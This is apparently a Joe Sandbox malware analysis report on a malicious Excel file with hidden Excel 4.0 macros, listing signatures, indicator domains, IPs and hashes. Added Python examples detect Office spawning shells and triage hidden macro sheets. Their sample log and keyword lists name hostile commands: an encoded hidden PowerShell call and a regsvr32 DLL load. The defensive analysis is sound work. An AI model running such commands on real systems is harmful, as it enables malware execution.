Windows Analysis Report statistic-1496367785.xls
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
statistic-1496367785.xls (initial sample) | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
statistic-1496367785.xls (initial sample) | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
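The Sigma match above is a parent/child process-image test: an Office binary as parent, a shell or LOLBin as child. The following is an added example, not part of the Joe Sandbox report and not the Sigma rule file itself; it implements that selection in Python over Sysmon Event ID 1 messages in their "Key: value" text rendering and runs it on a constructed log. The Office and shell image lists approximate the public rule and are an assumption, and the log lines are constructed, not taken from this analysis.

```python
"""Detection logic for 'Microsoft Office Product Spawning Windows Shell' run over
process-creation events, mirroring the Sigma rule's parent/child image selection."""
from dataclasses import dataclass

# Selection lists approximating the public Sigma rule (assumption: the exact lists
# in the rule version the sandbox shipped may differ).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "eqnedt32.exe", "visio.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "wmic.exe",
                  "schtasks.exe", "certutil.exe", "bitsadmin.exe", "hh.exe", "msbuild.exe"}


@dataclass
class ProcessCreate:
    utc_time: str
    image: str
    command_line: str
    parent_image: str
    user: str = ""


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows path ('C:\\X\\EXCEL.EXE' -> 'excel.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_office_shell(ev: ProcessCreate) -> bool:
    # Sigma: ParentImage|endswith one of the Office binaries AND Image|endswith a shell/LOLBin
    return basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN


def parse_sysmon_text(text: str) -> list[ProcessCreate]:
    """Parse Sysmon Event ID 1 messages in their 'Key: value' text rendering."""
    events = []
    for block in text.split("Process Create:")[1:]:
        fields = {}
        for line in block.strip().splitlines():
            key, sep, value = line.partition(":")   # first colon only; paths keep their 'C:'
            if sep:
                fields[key.strip()] = value.strip()
        events.append(ProcessCreate(fields.get("UtcTime", ""), fields.get("Image", ""),
                                    fields.get("CommandLine", ""), fields.get("ParentImage", ""),
                                    fields.get("User", "")))
    return events


def hunt(text: str) -> list[ProcessCreate]:
    """Return the process-creation events the rule would flag."""
    return [ev for ev in parse_sysmon_text(text) if matches_office_shell(ev)]


# Constructed sample log (not taken from the report): two benign events and two that
# the rule should flag.
SAMPLE_LOG = r"""
Process Create:
UtcTime: 2021-01-01 10:00:01.000
Image: C:\Windows\splwow64.exe
CommandLine: C:\Windows\splwow64.exe 12288
User: CORP\alice
ParentImage: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Process Create:
UtcTime: 2021-01-01 10:00:02.000
Image: C:\Windows\System32\cmd.exe
CommandLine: "cmd.exe" /c whoami
User: CORP\alice
ParentImage: C:\Windows\explorer.exe
Process Create:
UtcTime: 2021-01-01 10:00:03.000
Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32 -s C:\Users\alice\AppData\Local\Temp\out.dll
User: CORP\alice
ParentImage: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Process Create:
UtcTime: 2021-01-01 10:00:04.000
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell -nop -w hidden -enc SQBFAFgA
User: CORP\bob
ParentImage: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"""

if __name__ == "__main__":
    for ev in hunt(SAMPLE_LOG):
        print(f"[ALERT] {ev.utc_time} {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line}")
```

Matching on the image file name rather than the full path keeps the check stable across Office install locations (Office16 under Program Files versus Program Files (x86), Click-to-Run versus MSI); the printing helper splwow64.exe is the usual benign Excel child and is deliberately absent from the child list.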
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: statistic-1496367785.xls | Virustotal: 38% detection rate |
Source: statistic-1496367785.xls | ReversingLabs: 35% detection rate, label Document-Excel.Trojan.Woreflint |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | (171 entries; the matched strings were not preserved in this extraction) |
Source: | Network traffic detected: | (244 entries; the endpoints were not preserved in this extraction) |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process information set: | (60 entries; the values were not preserved in this extraction) |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel |
Source: | File source: |
Source: | File source: |
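The findings above (hidden Excel 4.0 macro sheet, suspicious formulas, abnormally large hidden macro sheet, and the Yara hit for a hidden Macro 4.0 sheet) can be reproduced statically from the BIFF8 Workbook stream without opening the file in Excel. The example below is added here and is not Joe Security's Yara rule or code: it walks the BIFF record framing, decodes BoundSheet8 records (sheet name, sheet type and hidden/very-hidden state, as laid out in MS-XLS), estimates each sheet substream's size from the lbPlyPos offsets, and scans for string literals that commonly appear as XLM formula arguments. The workbook it runs on is constructed inline; the keyword list, the filler record used in the constructed sheet and the `triage_file` helper (which needs the third-party olefile package) are assumptions, and the keyword scan is only a heuristic because XLM function names such as EXEC or CALL are stored as token indices, not as text.

```python
"""Static triage of a legacy .xls (BIFF8) Workbook stream: list sheets, flag
hidden / very-hidden Excel 4.0 (XLM) macro sheets, estimate each sheet
substream's size and scan for suspicious string literals."""
import struct
from dataclasses import dataclass

BOUNDSHEET = 0x0085   # MS-XLS BoundSheet8 record (one per sheet, in the globals substream)
BOF = 0x0809
EOF_RECORD = 0x000A
STRING = 0x0207       # used only as filler in the constructed sample below

SHEET_TYPES = {0x00: "worksheet", 0x01: "macro sheet (XLM)", 0x02: "chart", 0x06: "VBA module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
# Literals that often appear as XLM formula arguments (assumed list). Heuristic only:
# XLM function names are stored as token indices, so only string arguments show up.
SUSPICIOUS = ("URLDownloadToFileA", "urlmon", "regsvr32", "rundll32", "powershell", "cmd /c", "http")


@dataclass
class SheetInfo:
    name: str
    sheet_type: str
    visibility: str
    offset: int        # lbPlyPos: start of the sheet's substream within the Workbook stream


def iter_records(stream: bytes):
    """Yield (type, payload) for each BIFF record: 2-byte type, 2-byte length, payload."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield rtype, stream[pos:pos + rlen]
        pos += rlen


def parse_boundsheet(payload: bytes) -> SheetInfo:
    # lbPlyPos (4) | hsState (1, low 2 bits) | dt (1) | cch (1) | fHighByte flag (1) | name
    lb_ply_pos, hs_state, dt, cch, flags = struct.unpack_from("<IBBBB", payload, 0)
    raw = payload[8:]
    name = (raw[:cch * 2].decode("utf-16-le", "replace") if flags & 0x01
            else raw[:cch].decode("latin-1"))
    return SheetInfo(name, SHEET_TYPES.get(dt, f"unknown (0x{dt:02x})"),
                     VISIBILITY.get(hs_state & 0x03, "reserved"), lb_ply_pos)


def list_sheets(workbook: bytes) -> list[SheetInfo]:
    return [parse_boundsheet(p) for t, p in iter_records(workbook) if t == BOUNDSHEET]


def triage(workbook: bytes) -> dict:
    sheets = list_sheets(workbook)
    # Substream size = distance to the next substream start (or to the end of the stream).
    starts = sorted({s.offset for s in sheets} | {len(workbook)})
    sizes = {s.name: starts[starts.index(s.offset) + 1] - s.offset for s in sheets}
    hidden_macro = [s.name for s in sheets
                    if s.sheet_type.startswith("macro") and s.visibility != "visible"]
    hits = {kw: (kw.encode() in workbook or kw.encode("utf-16-le") in workbook)
            for kw in SUSPICIOUS}
    return {"sheets": sheets, "sheet_sizes": sizes,
            "hidden_macro_sheets": hidden_macro, "keyword_hits": hits}


def triage_file(path: str) -> dict:
    """Triage a real .xls: the Workbook stream sits inside the OLE2 container (needs olefile)."""
    import olefile  # third-party, only needed for real files
    ole = olefile.OleFileIO(path)
    try:
        stream = "Workbook" if ole.exists("Workbook") else "Book"
        return triage(ole.openstream(stream).read())
    finally:
        ole.close()


# ---- constructed sample workbook (not the analysed file): one visible worksheet
# ---- and one very-hidden XLM macro sheet whose substream holds a telltale literal
def _rec(rtype: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(pos: int, hs_state: int, dt: int, name: str) -> bytes:
    return _rec(BOUNDSHEET, struct.pack("<IBBBB", pos, hs_state, dt, len(name), 0) + name.encode("latin-1"))


def _bof(dt: int) -> bytes:   # BIFF8 BOF payload: vers, dt, rupBuild, rupYear, bfh, sfo
    return _rec(BOF, struct.pack("<HHHHII", 0x0600, dt, 0x0DBB, 0x07CC, 0, 0x0106))


def build_sample_workbook() -> bytes:
    eof = _rec(EOF_RECORD, b"")
    sheet1 = _bof(0x0010) + eof                                   # empty worksheet
    literal = b"URLDownloadToFileA"
    macro1 = _bof(0x0040) + _rec(STRING, struct.pack("<HB", len(literal), 0) + literal) + eof
    globals_len = len(_bof(0x0005)) + 2 * (4 + 8 + len("Sheet1")) + len(eof)
    pos1, pos2 = globals_len, globals_len + len(sheet1)
    globals_ = (_bof(0x0005) + _boundsheet(pos1, 0, 0x00, "Sheet1")
                + _boundsheet(pos2, 2, 0x01, "Macro1") + eof)   # hsState 2 = very hidden
    return globals_ + sheet1 + macro1


if __name__ == "__main__":
    report = triage(build_sample_workbook())
    for s in report["sheets"]:
        print(f"{s.name:10} {s.sheet_type:20} {s.visibility:12} {report['sheet_sizes'][s.name]:6d} bytes")
    print("hidden macro sheets:", report["hidden_macro_sheets"])
    print("keyword hits:", sorted(k for k, v in report["keyword_hits"].items() if v))
```

A very-hidden sheet (hsState 2) cannot be unhidden from Excel's own UI, so a very-hidden sheet of type macro is a strong indicator on its own; comparing substream sizes then shows whether the hidden sheet carries far more content than the visible decoy, which is what the "abnormal large hidden Excel 4.0 Macro sheet" signature is measuring.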
Mitre Att&ck Matrix |
---|
The superscript counts from the original page are shown in parentheses: the number of triggered signatures mapped to that technique. Techniques without a count are the matrix's default column entries and were not matched by this sample. |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting (2) | Path Interception | Process Injection (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution (23) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | File and Directory Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 (1) | Security Account Manager | System Information Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (2) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
statistic-1496367785.xls | 38% | Virustotal | |
statistic-1496367785.xls | 35% | ReversingLabs | Document-Excel.Trojan.Woreflint |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(domain name not preserved in this extraction) | 1% | Virustotal | |
(domain name not preserved in this extraction) | 1% | Virustotal | |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100 scanner rows; the URL strings themselves were not preserved in this extraction and none was flagged: |
---|
Rows | Detection | Scanner | Label |
---|---|---|---|
92 | 0% | URL Reputation | safe |
4 | 0% | Virustotal | |
4 | 0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
academy.haleemcampus.com | 108.179.232.80 | true | false | | unknown |
psq.com.mx | 162.241.2.112 | true | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(100 URLs; names and sources not preserved in this extraction) | | false (all) | | 72 high, 28 unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
108.179.232.80 | academy.haleemcampus.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
162.241.2.112 | psq.com.mx | United States | 26337 | OIS1US | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 441923 |
Start date: | 29.06.2021 |
Start time: | 17:46:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | statistic-1496367785.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLS@5/7@2/2 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
108.179.232.80 | | | malicious | | |
162.241.2.112 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
psq.com.mx | | | malicious | | |
academy.haleemcampus.com | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
OIS1US | | | malicious | | |
UNIFIEDLAYER-AS-1US | | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | | | malicious | | |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 135209 |
Entropy (8bit): | 5.363078467391509 |
Encrypted: | false |
SSDEEP: | 1536:pcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:9EQ9DQW+zwXO1 |
MD5: | F36D695FFC65C02CF6642D107DE3436E |
SHA1: | A6E39AE62834265B4937B554FF799614E6CBD2BC |
SHA-256: | 0A1F0B3E72F02FBF65827B4356D516DA6D321ACB4EB356F16657728C82584E94 |
SHA-512: | E21B9C58D9A8AE3B1CA665CB890568370C080F42E41072CED05ED5CA5C4A7507ADF0AC349300276F24EC4CDCE5BFB3D88FF53AB15A14443EFB4FE6D5D3BD9850 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 82869 |
Entropy (8bit): | 7.897086363765867 |
Encrypted: | false |
SSDEEP: | 1536:ILMCBgFqO57Lav5F/U2SiwFNfZ7pjS8ZiYhuiNde9kJY:04qO5PWzUWwtNm8ZUmY |
MD5: | 30C64BA689D114C1B1F07726F4B0F643 |
SHA1: | 6E453A1835195371901BDEC66BDDE4EAAC7B0DD2 |
SHA-256: | E9806EDFE4032C38F466EC4CB002167D14B5076F4197EBE861053E1A3BE5ECC9 |
SHA-512: | A285BEF29AB022AC67BB0E0D55E0A9DD1E04F16D301C5EA081AC7B7D6AA598875692E742FCAB3285A61BA2C51EC632AE8BAC04CE5E1BE2603899763B4512510E |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.655853070338881 |
Encrypted: | false |
SSDEEP: | 12:8vVCXUM7t7gcduCH2BvOpM4IiujBF+WrjAZ/DYbDMSeuSeL44t2Y+xIBjKZm:8W9qmpTyVAZbcDG7aB6m |
MD5: | C28D5CC4959D0E1E0857E734A7985781 |
SHA1: | 02DD24C036CD987F04E14B31EF9ECDEDF4B75E50 |
SHA-256: | E1050433736C4F3D25755ECD8A6E34798FA29A618D0A58BC759B4D208756C19A |
SHA-512: | B48A5C3C3280FD958E5042B35A152E976770ED7C9AD959048870DF6790740DF9007302E66BDEDCBC0D33523995DDF3E74172DA641AC48EDB37D7638D779DD23C |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 113 |
Entropy (8bit): | 4.71317481637129 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK |
MD5: | 827572951026F0F9437E31D866B8FF08 |
SHA1: | 0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6 |
SHA-256: | 493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B |
SHA-512: | F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 2210 |
Entropy (8bit): | 4.704393826342388 |
Encrypted: | false |
SSDEEP: | 48:8Ogw9qmp5Y5MiWlOkMkBB6pOgw9qmp5Y5MiWlOkMkBB6:8hcZiWlOdwKhcZiWlOdw |
MD5: | 1DBF118D07425F742972F80B6F479464 |
SHA1: | 348393828935581579897E182E3872D7033C7054 |
SHA-256: | 8996BA14F72BBE59CC466D0F4AB1911D640C453A9EC210C47DD791D3301037AB |
SHA-512: | 9A2021007A4621460404B0BDC89CC20E55E35F7F26F6F4AAAFD5F3961AA10539D9D8122016337C16769CE55F360D49B2CF54EF351A671C799CA325D283135453 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 222635 |
Entropy (8bit): | 5.628519548551312 |
Encrypted: | false |
SSDEEP: | 6144:a8rmdAIByzElbSRg3WCbgBeP5NmPTdbsizCnQC6VqCJ6KS8rmdAIByzElbSRg3WS:uLnQC6sCRY |
MD5: | 6F378E0FCB99595324566C5A91985656 |
SHA1: | 9059F775A49511C7A614F831EC90841008171C0D |
SHA-256: | 3026EAEDD6AFA59DF4C54D4CF1E1EE6A4891F32CC83B2B1AA95426B0F6458763 |
SHA-512: | 467D5668E72E6D3B891D261512CDDC4A53742B06E2D345BA8180F46FEFA23958BD77D0D6E188624B3F0132A3DB738C108BF774BD918A3571F55CFB98E9B42C06 |
Malicious: | false |
Reputation: | low |
Preview: | |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 2.0857713013138395 |
TrID: | |
File name: | statistic-1496367785.xls |
File size: | 536064 |
MD5: | 7fb48e03b899f792be6c3118a46c5c8f |
SHA1: | 55445d13cd433121c6c2bfb31414b08e31e28a65 |
SHA256: | 1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f |
SHA512: | e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f |
SSDEEP: | 6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | |
---|---|
Document Type: | OLE |
Number of OLE Files: | 1 |
OLE File "statistic-1496367785.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05 18:17:20 |
Last Saved Time: | 2021-05-21 08:07:02 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.298297266065 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.277521975637 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . G . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 521856 |
Entropy: | 2.01072652781 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
